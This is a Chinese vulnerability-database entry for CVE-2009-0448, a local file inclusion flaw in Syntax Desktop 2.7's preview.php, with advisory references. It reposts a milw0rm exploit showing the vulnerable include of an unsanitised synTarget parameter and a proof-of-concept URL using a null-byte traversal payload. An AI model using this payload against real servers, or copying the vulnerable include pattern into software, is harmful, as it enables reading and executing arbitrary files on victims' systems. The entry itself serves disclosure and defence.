Syntax Desktop 'synTarget' Parameter 本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117352 漏洞类型 路径遍历
发布时间 2009-02-04 更新时间 2009-03-06
CVE编号 CVE-2009-0448 CNNVD-ID CNNVD-200902-216
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7977
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-216
|漏洞详情
SyntaxDesktop是一款创新的网站内容发布系统。SyntaxDesktop2.7版本中的admin/modules/aa/preview.php存在目录遍历漏洞。远程攻击者可以借助synTarget参数中的"..",包含和运行任意的本地文件。
|漏洞EXP
-----------------:local File Include:-----------------
  -------------------------------------------------------
script: syntax-desktop 2-7
   
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/syntax-desktop/syntax-desktop-2-7.zip?modtime=1215600196&big_mirror=0
   
   
------------------------------------------------------------------
........................................................
vul: /admin/modules/aa/preview.php

line 42 $target=$_GET["synTarget"];
  ob_start();
line 44 include("../../../$target");

-----------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/path/admin/modules/aa/preview.php?synTarget=[Lfi]%00


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-02-04]
|参考资料

来源:XF
名称:syntax-desktop-preview-file-include(48496)
链接:http://xforce.iss.net/xforce/xfdb/48496
来源:VUPEN
名称:ADV-2009-0319
链接:http://www.vupen.com/english/advisories/2009/0319
来源:BID
名称:33601
链接:http://www.securityfocus.com/bid/33601
来源:MILW0RM
名称:7977
链接:http://www.milw0rm.com/exploits/7977